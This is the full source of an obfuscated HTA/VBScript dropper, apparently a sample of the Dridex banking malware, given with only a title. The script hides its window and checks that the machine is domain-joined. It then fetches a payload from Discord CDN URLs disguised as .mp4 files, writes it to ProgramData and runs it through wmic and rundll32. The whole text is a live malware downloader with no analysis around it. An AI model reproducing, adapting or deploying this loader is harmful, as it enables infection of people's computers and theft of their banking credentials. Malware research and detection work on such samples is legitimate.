Dridex (New HTA)

1. <!DOCTYPE html>
2. <html>
3. <head>
4. <HTA:APPLICATION ID="CS"
5. APPLICATIONNAME="ttrgnkrtegjtjgjerg"
6. WINDOWSTATE="minimize"
7. MAXIMIZEBUTTON="no"
8. MINIMIZEBUTTON="no"
9. CAPTION="no"
10. SHOWINTASKBAR="no">
11. <script type="text/vbscript" LANGUAGE="VBScript" >
12. E_w_C_U_u_O_A_c_P = "wmi" & "c p" & Chr(114) & "oce" & "ss" & " c" & "al" & "l c" & "rea" & "" & "te" & Chr(32) & "" & "" & Chr(34) & "run" & "dl" & Chr(108) & "32" & ".ex" & "" & Chr(101) & " C:" & Chr(92) & "\P" & "ro" & "gra" & "" & "" & Chr(109) & "Da" & "ta" & "\i" & "" & "r5" & "0_" & Chr(51) & Chr(50) & Chr(46) & "mp4" & "" & " Sn" & "mp" & "Mg" & "" & "rOp" & "en" & "" & Chr(34)
13. Set O_J_Y_J_z_Y_U_h_Z_a_l_H = CreateObject("" & "" & "MS" & Chr(88+1-1) & Chr(77+1-1) & Chr(76+1-1) & Chr(50+1-1) & "" & ".S" & Chr(101+1-1) & "rv" & "" & "" & "erX" & "MLH" & "TT" & "P." & "6.0" & "")
14. Set E_I_f_d_A_s_j_S_v_W_H_O_B_W = createobject("Ad" & Chr(111+1-1) & Chr(100+1-1) & "b." & "St" & Chr(114+1-1) & "" & Chr(101+1-1) & Chr(97+1-1) & Chr(109+1-1) & "" & "")
15. S_J_y_z_r_D_T_t_E = "" & "" & "" & Chr(87+1-1) & Chr(115+1-1) & "cri" & Chr(112+1-1) & "t.S" & "hel" & "" & "" & Chr(108+1-1) & ""
16. Set S_d_C_h_y_s_U_k_p = CreateObject(S_J_y_z_r_D_T_t_E)
17. P_M_d_r_g_Q_N_p_b_J_z_F_x_O = S_d_C_h_y_s_U_k_p.expandenvironmentstrings("%USERDOMAIN%")
18. L_s_j_z_k_S_b_n_H_b_Q_g_z_G_v = Replace(S_d_C_h_y_s_U_k_p.expandenvironmentstrings("%LOGONSERVER%"), CHR(92+1-1+1-1), "")
19. </script>
20.  
21. </head>
22. <body>
23. <script type="text/vbscript" LANGUAGE="VBScript" >
24.  
25.  
26. If LCase(L_s_j_z_k_S_b_n_H_b_Q_g_z_G_v) <> LCase(P_M_d_r_g_Q_N_p_b_J_z_F_x_O) Then
27. For Each s_C_v_r_i_r_P_f_G_n_v_a_g in Array("htt" & "ps:" & "//c" & "dn." & "di" & "sco" & "rd" & Chr(97+1-1) & Chr(112+1-1) & Chr(112+1-1) & Chr(46+1-1) & "co" & "m/" & Chr(97+1-1) & Chr(116+1-1) & Chr(116+1-1) & "ac" & "hme" & "" & Chr(110+1-1) & "ts/" & Chr(57+1-1) & "112" & "59" & "06" & "01" & "" & Chr(48+1-1) & "655" & Chr(57+1-1) & Chr(53+1-1) & "31/" & "912" & Chr(51+1-1) & Chr(50+1-1) & Chr(48+1-1) & Chr(52+1-1) & "" & Chr(56+1-1) & Chr(54+1-1) & "23" & "770" & "014" & "6/u" & Chr(90+1-1) & Chr(102+1-1) & "SHZ" & "Zl" & Chr(99+1-1) & Chr(117+1-1) & "ntf" & "uc" & "k." & "mp" & Chr(52+1-1) , "ht" & "tps" & ":/" & "/cd" & Chr(110+1-1) & ".d" & "is" & "cor" & Chr(100+1-1) & Chr(97+1-1) & "" & "" & "pp" & ".co" & "m/" & "att" & "ac" & Chr(104+1-1) & Chr(109+1-1) & "" & "en" & "ts" & "/91" & "125" & Chr(57+1-1) & "060" & Chr(49+1-1) & "065" & "595" & "31" & "/9" & "12" & "32" & "057" & "25" & "39" & "68" & "" & "" & "285" & Chr(54+1-1) & Chr(47+1-1) & Chr(103+1-1) & "uzE" & "oc" & "un" & "tf" & "uck" & ".mp" & Chr(52+1-1) , Chr(104+1-1) & "" & "tt" & Chr(112+1-1) & Chr(115+1-1) & "" & ":/" & Chr(47+1-1) & Chr(99+1-1) & "dn." & Chr(100+1-1) & "isc" & "or" & "dap" & Chr(112+1-1) & ".c" & "om/" & "at" & "tac" & "" & "hme" & "nts" & "" & Chr(47+1-1) & Chr(57+1-1) & Chr(49+1-1) & "" & Chr(49+1-1) & "25" & "90" & Chr(54+1-1) & "01" & "06" & "559" & "53" & "1/" & "" & "91" & "23" & "204" & "53" & "304" & Chr(48+1-1) & "04" & Chr(54+1-1) & Chr(50+1-1) & "8/N" & "OUk" & "kFZ" & "lc" & "unt" & "fu" & "ck." & "mp4")
28. Set n_w_r_j_k_z_d_N_q_s_M_Q_I_W = CreateObject(Chr(83+1-1) & Chr(99+1-1) & "" & "" & Chr(114+1-1) & "ipt" & Chr(105+1-1) & "ng" & "" & ".Fi" & "le" & "Sy" & "ste" & "" & "mOb" & "" & "" & "jec" & Chr(116+1-1))
29. If Not n_w_r_j_k_z_d_N_q_s_M_Q_I_W.FileExists(Chr(67+1-1) & "" & ":\\" & "Pr" & "ogr" & "" & "am" & "Dat" & Chr(97+1-1) & "" & "\ir" & Chr(53+1-1) & "" & "0_" & Chr(51+1-1) & "2.m" & "p4") Then
30.  
31.  
32. O_J_Y_J_z_Y_U_h_Z_a_l_H.Open Chr(71+1-1) & "" & Chr(69+1-1) & "" & "" & "" & "" & Chr(84+1-1) & "", s_C_v_r_i_r_P_f_G_n_v_a_g, False
33. O_J_Y_J_z_Y_U_h_Z_a_l_H.Send
34. If Len(O_J_Y_J_z_Y_U_h_Z_a_l_H.ResponseBody)>2000 And O_J_Y_J_z_Y_U_h_Z_a_l_H.Status = 200 Then
35. with E_I_f_d_A_s_j_S_v_W_H_O_B_W
36. .type = 1
37. .open
38. .write O_J_Y_J_z_Y_U_h_Z_a_l_H.responseBody
39. .savetofile "" & "C:\" & "" & Chr(92+1-1) & "Pro" & "gr" & "am" & "Da" & "ta\" & Chr(105+1-1) & "" & Chr(114+1-1) & "" & Chr(53+1-1) & "0_" & "32." & "mp4", 2
40. .close
41. end with
42. with S_d_C_h_y_s_U_k_p
43. .Exec(E_w_C_U_u_O_A_c_P)
44. end with
45. Exit For
46. End If
47. End If
48. Next
49. End If
50. </script>
51. </body>
52. </html>